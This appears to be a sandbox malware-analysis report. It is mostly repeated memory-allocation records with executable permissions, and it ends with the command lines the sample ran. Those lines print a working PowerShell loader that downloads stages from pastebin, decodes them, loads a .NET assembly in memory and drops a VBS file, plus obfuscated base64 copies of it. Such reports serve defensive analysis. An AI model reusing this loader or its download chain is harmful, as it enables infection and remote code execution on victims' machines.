protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dll03.ps1
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/7G2PyFKT/d/ee.etsap//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
cmdline powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★Ow